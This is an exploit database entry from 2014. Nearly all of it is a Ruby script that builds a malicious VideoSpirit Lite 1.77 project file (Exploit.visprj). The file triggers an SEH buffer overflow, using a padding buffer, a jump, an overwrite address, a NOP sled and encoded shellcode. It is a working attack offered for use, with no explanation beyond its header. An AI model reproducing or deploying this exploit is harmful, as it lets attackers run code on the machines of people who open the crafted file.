VideoSpirit Lite 1.77 - (SEH) Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType
VideoSpirit Lite 1.77 SEH Buffer Overflow, Vendor: VeryTools, Software link: videospirit/download, Exploit Author: metacom, Tested on: Win7-Win8-E

                                                #!/usr/bin/ruby
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
print &#39;&#39;&#39;
        
		VideoSpirit Lite 1.77 Seh Buffer Overflow
		Version: Lite 1.77
		Date found: 11.11.2013
		Exploit Author: metacom
		Tested on: Win7-Win8-EN
&#39;&#39;&#39;
sleep(3)
head=(&#34;\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20&#34;+
&#34;\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70&#34;+
&#34;\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20&#34;+
&#34;\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A&#34;+
&#34;\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22&#34;+
&#34;\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65&#34;+
&#34;\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76&#34;+
&#34;\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B&#34;+
&#34;\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B&#34;+
&#34;\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72&#34;+
&#34;\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A&#34;+
&#34;\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79&#34;+
&#34;\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73&#34;+
&#34;\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C&#34;+
&#34;\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30&#34;+
&#34;\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20&#34;+
&#34;\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73&#34;+
&#34;\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D&#34;+
&#34;\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20&#34;+
&#34;\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A&#34;+
&#34;\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32&#34;+
&#34;\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C&#34;+
&#34;\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76&#34;+
&#34;\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20&#34;+
&#34;\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36&#34;+
&#34;\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B&#34;+
&#34;\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20&#34;+
&#34;\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31&#34;+
&#34;\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D&#34;+
&#34;\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22&#34;)
buffer=&#34;\x41&#34; * 104
buffer+=&#34;\xeb\x0c\xff\xff&#34; # jump
buffer+=[0x1008667f].pack(&#39;V&#39;)# 0x1008667f
buffer+=&#34;\x90&#34; * 80 # landing zone
buffer+=(&#34;\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1&#34;+
&#34;\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd&#34;+
&#34;\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43&#34;+
&#34;\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0&#34;+
&#34;\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f&#34;+
&#34;\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40&#34;+ # Bad Characters
&#34;\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c&#34;+ # \x00\x0a\x0d\x1a\x21\x22\x26
&#34;\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e&#34;+
&#34;\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19&#34;+
&#34;\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33&#34;+
&#34;\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90&#34;+
&#34;\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee&#34;+
&#34;\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7&#34;+
&#34;\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56&#34;+
&#34;\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2&#34;+
&#34;\x99\x03&#34;)
buffer+=&#34;\xCC&#34; * 4500
footer=(&#34;\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65&#34;+
&#34;\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D&#34;+
&#34;\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76&#34;+
&#34;\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20&#34;+
&#34;\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20&#34;+
&#34;\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22&#34;+
&#34;\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32&#34;+
&#34;\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20&#34;+
&#34;\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20&#34;+
&#34;\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E&#34;)
off= head + buffer + footer
print &#34;\t\t[+]Creating Exploit File...\n&#34;
sleep(1)
begin
File.open(&#34;Exploit.visprj&#34;,&#34;wb&#34;) do |f| 
f.write off
f.close
print &#34;\t\t[+]File Exploit.visprj create successfully.\n&#34;
sleep(1)
end
rescue
print &#34;**[-]Error: #{$!}\n&#34;
exit(0)
end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1